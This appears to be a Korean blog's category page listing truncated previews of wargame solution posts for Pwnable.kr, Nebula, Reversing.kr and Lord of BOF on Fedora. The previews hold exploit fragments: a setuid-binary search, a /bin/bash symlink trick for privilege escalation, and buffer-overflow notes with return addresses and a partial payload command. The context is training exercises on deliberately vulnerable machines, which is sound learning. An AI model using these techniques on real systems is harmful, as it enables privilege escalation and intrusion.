Wargames 썸네일형 리스트형 [Pwnable.kr] Toddler's Bottle Solutions - 20/20 보호되어 있는 글입니다. 더보기 [Exploit-Exercise] Nubula Solutions SolutionsLevel 00 1234567level00@nebula:~$ find / -perm -4000 -user flag00 2>/dev/null/bin/.../flag00/rofs/bin/.../flag00level00@nebula:~$ /bin/.../flag00Congrats, now run getflag to get your flag!flag00@nebula:~$ getflagYou have successfully executed getflag on a target accountcs Level 01 1234567level01@nebula:/home/flag01$ ln -s /bin/bash /tmp/alevel01@nebula:/home/flag01$ echo -e '#!/bin/bash.. 더보기 [Reversing.kr] Music Player 보호되어 있는 글입니다. 더보기 [Lord Of Bof] Lord Of BOF Solutions ( Fedora 10 ) Solutions Level 1 - off-by-one %ecx register overflow ; first we know about environment of Fedora 5 ; prologue and epilogue is changed ; by ecx register, it works as stack guard and stack shield ; normally we can't control ret address directly , but for controlling ret address, we need to know ecx(ret+4) ; but it's extremely difficult to guess %ecx register because of ALSR ; SO we need to use of.. 더보기 [Lord Of Bof] Lord Of BOF Solutions ( Fedora 4 ) Solutions Level 1 - up-upgraded simple buffer overflow ; no more fake ebp ; random library ; like FC3 level1 prob, use ret to ret for escaping random stack ; when using 12 ret, execve's argv of 2 is null ; ret address : 0x08048451 ; execve address : 0x00832abc ; for file name : 85 c0 75 53 65 a1 54 ; payload : ln -s ./shell $(echo -en "\x85\xc0\x75\x53\x65\xa1\x54") ./cruel $(python -c 'print "A.. 더보기 이전 1 2 3 4 5 6 7 8 ··· 12 다음